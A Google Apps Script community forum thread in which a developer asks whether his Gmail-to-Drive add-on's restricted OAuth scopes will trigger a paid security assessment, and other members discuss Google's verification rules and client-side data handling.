Security assessment process

[Darren D'Mello]

Hello Folks,

I have developed a public editor addon with the following scopes.

• See, edit, create, and delete all of your Google Drive files
• See, edit, create, and delete all your Google Sheets spreadsheets
• Read, compose, and send emails from your Gmail account
• Display and run third-party web content in prompts and sidebars inside Google applications
• Allow this application to run when you are not present
• See your primary Google Account email address
• See your personal info, including any personal info you've made publicly available

Do I need to undergo a security assessment and pay the fees to a third party assessor?
My addon does not use external sources scope, it will not send data to a server.
I have read the documentation about https://support.google.com/cloud/answer/9110914?hl=en But I am still not clear whether I need to undergo a security assessment.

I don't afford to pay for a security assessment. I am afraid if I submit my addon for a review I may be charged.

Could anyone please advise?

[Romain Vialard]

Best is to test :)

Submit your GCP project for OAuth verification:

https://developers.google.com/workspace/marketplace/configure-oauth-consent-screen#submit_for_oauth_verification

You will see if they ask you to pay for a security assessment.

As indicated here:

Local Data Storage: Local client applications don't need to undergo a security assessment because data is run, stored, and processed only on the user's device. Local client applications that only allow user- configured transmissions of Restricted Scope data from the device may be exempt from this requirement.

https://support.google.com/cloud/answer/9110914#needed&zippy=%2Cwhy-is-the-security-assessment-needed%2Cif-i-have-gone-through-a-security-assessment-once-for-the-restricted-gmail-scopes-do-i-need-to-go-through-the-assessment-again-when-the-list-of-restricted-scopes-expands%2Ci-dont-have-a-vulnerability-disclosure-program-for-my-app-and-its-a-requirement-for-the-security-assessment-what-can-i-do%2Chow-long-is-the-security-assessment-valid-for%2Cwhat-access-is-needed-by-the-third-party-security-assessor-for-the-deployment-review%2Cwhat-happens-if-i-dont-remediate-my-vulnerabilities%2Cwhen-is-the-security-assessment-not-required

But not sure if not asking for the urlfetch scope ("https://www.googleapis.com/auth/script.external_request") is enough to be exempt.

You could send data to a server via JS on client side (as you are asking the "Display and run third-party web content in prompts and sidebars inside Google applications" scope)

[dimud...@gmail.com]

If you look at the descriptions for Drive scopes at the following link:

https://developers.google.com/identity/protocols/oauth2/scopes#drive

You'll see that your app is using https://www.googleapis.com/auth/drive  which is a restricted scope (as documented here). So it will likely trigger a security assessment during the review process.

[Romain Vialard]

Security assessment is not yet enforced for Google Drive scopes (as far as I know).

Only enforced for some Gmail scopes (including those used by Darren here).

[dimud...@gmail.com]

"Enforcement of the Drive requirements in this section will go into effect early 2020."

That's a quote directly from Google's Documentation. See https://developers.google.com/terms/api-services-user-data-policy#additional_requirements_for_specific_api_scopes.

Can't seem to find a specific date though (though I could have sworn I saw one before). 

Still, if they are going to make it a restricted scope by year's end Darren is bound to run into that issue eventually.

[Darren D'Mello]

Thanks Romain and Dimu

Could you tell me whether a addon is a local client application. Could you give an example of local client application?

My addon is about saving email messages to users Drive folder.

--
You received this message because you are subscribed to a topic in the Google Groups "Google Apps Script Community" group.
To unsubscribe from this topic, visit https://groups.google.com/d/topic/google-apps-script-community/BX_SFP6Q82E/unsubscribe.
To unsubscribe from this group and all its topics, send an email to google-apps-script-c...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/google-apps-script-community/3f058a6e-8fb7-4cc8-bf1a-565fb55edd86n%40googlegroups.com.

[Darren D'Mello]

The only thing to evade server data flow is not to use (use only menu)?

Display and run third-party web content in prompts and sidebars inside Google applications

[Alan Wells]

The scope for:

Display and run third-party web content in prompts and sidebars inside Google applications

Is for HTML, CSS and JavaScript that "runs" from your browser.

The JavaScript code for that scope is inside an HTML <script> tag.

That's all client side stuff that the browser processes, and the browser is an app that runs from your computer.

Chrome is downloaded to your device, and runs from your device as opposed to from a server somewhere else.

I apologize if you already know this, but sometimes things are assumed and there is a misunderstanding.

You can do things from the client side code, like accept a payment, or send data to a firebase database without using server code, and therefore not need the "external request" scope.  That scope is only for server side GET or POST requests.  You can make GET or POST requests from the client side, and client side SDK's do that also.

As far as the security assessment charge goes, I highly doubt that Google would refer you to a 3rd party for the security assessment or charge you for that without your consent.  I don't know that for sure because I've never done it, but I can't believe that Google can just send you a bill for $15,000 just because you submit for OAuth verification.  The worst that could probably happen is that they'll tell you that you need the security assessment.

I guess what I'd make sure to do is to read any terms that you are asked to agree to.  That's what the final authority is.

You can always click "Cancel" if you need to.

If they do tell you that you need a security assessment, then I'm not sure how you'd "get around" that.  Unless you make your code open source, and charge for consulting and implementation work, then I don't know how you'd monetize it, if that's what you're trying to do.  If you want it to be free, then you could just open source the code and tell them how to install it.

Unfortunately, the Gmail scope situation may prevent you from being able to publish the add-on.

If you could convince your users to create an Apps Script Web App of their own, that your add-on triggered, and then reads their own emails, that's the only strategy that I can think of that would work.  They would need to publish their own Web App that read the email, and sent the content back to your add-on.  But then your addon would need to be able to make an external request in order to trigger their Web App.  And the user would need to provide the published URL to your add-on.  I don't know whether that's a good idea or not, or viable, but that's the only thing I can think of if you really need to do more than just send emails, and they won't approve you.

[Darren D'Mello]

Thanks Alan. Absolutely helpful.

Also grateful to all the people who have replied.

You received this message because you are subscribed to the Google Groups "Google Apps Script Community" group.
To unsubscribe from this group and stop receiving emails from it, send an email to google-apps-script-c...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/google-apps-script-community/865da898-4247-46a8-ad65-c9d03e17ca7bn%40googlegroups.com.

--

Best,

Darren